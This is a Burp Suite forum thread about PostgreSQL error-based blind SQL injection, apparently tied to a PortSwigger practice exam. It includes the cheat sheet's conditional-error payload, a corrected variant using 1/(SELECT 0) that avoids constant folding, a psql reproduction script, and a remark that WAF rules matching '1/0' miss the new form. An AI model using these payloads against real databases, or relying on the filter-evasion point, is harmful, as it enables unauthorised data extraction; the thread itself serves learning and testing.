The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Error-Based SQL injection in PostgreSQL

Benjamin | Last updated: Dec 19, 2022 09:02PM UTC

Hi all,

In advance, sorry for the long post. I want to be as clear as possible.

I've been going quite crazy figuring out how to exploit error-based blind SQL injection for the practice exam (hope this isn't too big of a spoiler?). I believe there might be a problem with the SQL injection cheat sheet. After lots of googling, I found this post which described the problem I had: https://forum.portswigger.net/thread/postgresql-conditional-error-cheat-sheet-45348da5 . I'd like to bring attention to this thread again as I'm not sure the problem has been resolved (I might be wrong though!).

The core of the problem is as follows: the cheat sheet recommends the following for error-based injection:

(SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN CAST(1/0 AS INTEGER) ELSE NULL END)

This works perfectly fine when the (YOUR-CONDITION-HERE) part does not contain a nested SELECT statement, e.g.

(SELECT CASE WHEN (true) THEN CAST(1/0 AS INTEGER) ELSE NULL END)   // error (divide by 0)
(SELECT CASE WHEN (false) THEN CAST(1/0 AS INTEGER) ELSE NULL END)  // no error

This is expected behavior. However, things change once we use a SELECT statement in the (YOUR-CONDITION-HERE) part:

(SELECT CASE WHEN (SELECT true) THEN CAST(1/0 AS INTEGER) ELSE NULL END)   // error (divide by 0)
(SELECT CASE WHEN (SELECT false) THEN CAST(1/0 AS INTEGER) ELSE NULL END)  // error (divide by 0)

As can be seen above, both conditions for some reason perform the division by 0 operation, while the second statement clearly shouldn't do this.

I verified this behavior by testing it on a DB fiddle:

SELECT (SELECT CASE WHEN (false) THEN CAST(1/0 AS TEXT) ELSE NULL END)
---output----
Returns NULL

SELECT (SELECT CASE WHEN (SELECT false) THEN CAST(1/0 AS TEXT) ELSE NULL END)
---output----
psql:commands.sql:1: ERROR: division by zero

Is there something obvious I'm missing here? Can anyone clarify this behavior? Should the cheat sheet be updated?

Michelle, PortSwigger Agent | Last updated: Dec 20, 2022 02:48PM UTC

Thanks for getting in touch. I'll check the details of this with the team. Are you looking for the variations described in https://forum.portswigger.net/thread/postgresql-conditional-error-cheat-sheet-45348da5 to be added to the SQL cheat sheet (as they don't appear to be included currently)?

Benjamin | Last updated: Dec 20, 2022 05:18PM UTC

Hi Michelle, thanks for your reply. Correct, to be specific, I think the following query might be helpful on the cheat sheet for conditional error PostgreSQL injection:

SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/(SELECT 0) ELSE 1 END

Please do verify with the team, as I might be missing something obvious ;).
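The following psql script is an added reproduction of the behaviour discussed in this thread; it is not code from the thread or from PortSwigger. It assumes a throwaway PostgreSQL database. The underlying cause is documented in the PostgreSQL manual under "Expression Evaluation Rules": the planner folds constant subexpressions before execution, so a literal 1/0 in a THEN arm is evaluated at planning time whenever the CASE itself cannot be folded away, while a division by an uncorrelated subquery is deferred to run time.

```sql
-- Added reproduction script (not part of the thread). Run each statement on
-- its own in psql; the ones that raise "division by zero" abort only that
-- statement.

-- 1. Constant WHEN condition. The planner folds the entire CASE away, so the
--    1/0 in the THEN arm is only ever evaluated when the condition is true
--    (the outcomes Benjamin reports: error, then NULL).
SELECT CASE WHEN (true)  THEN CAST(1/0 AS INTEGER) ELSE NULL END;
SELECT CASE WHEN (false) THEN CAST(1/0 AS INTEGER) ELSE NULL END;

-- 2. Subquery WHEN condition. The CASE can no longer be folded, but the
--    constant subexpression 1/0 inside it still is, so the division happens
--    at planning time regardless of which arm would be chosen. This is why
--    the thread sees "division by zero" for both (SELECT true) and
--    (SELECT false).
SELECT CASE WHEN (SELECT true)  THEN CAST(1/0 AS INTEGER) ELSE NULL END;
SELECT CASE WHEN (SELECT false) THEN CAST(1/0 AS INTEGER) ELSE NULL END;

-- 3. The folding is visible in the plan: for the false-constant form the
--    Output line of the Result node holds the folded constant, not a CASE.
EXPLAIN VERBOSE
SELECT CASE WHEN (false) THEN CAST(1/0 AS INTEGER) ELSE NULL END;

-- 4. Benjamin's proposed form. (SELECT 0) is an uncorrelated subquery, which
--    the planner turns into an InitPlan evaluated at run time instead of a
--    constant, so 1/(SELECT 0) is not folded and is executed only when the
--    THEN arm is actually selected. The same holds for any non-constant
--    condition, not just (SELECT ...) literals.
SELECT CASE WHEN (SELECT true)  THEN 1/(SELECT 0) ELSE 1 END;
SELECT CASE WHEN (SELECT false) THEN 1/(SELECT 0) ELSE 1 END;
```

For the same reason, anyone reviewing WAF or query-log detections for this pattern should not rely on the literal "1/0" string: the subquery-divisor form carries no such constant.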

Michelle, PortSwigger Agent | Last updated: Dec 21, 2022 08:57AM UTC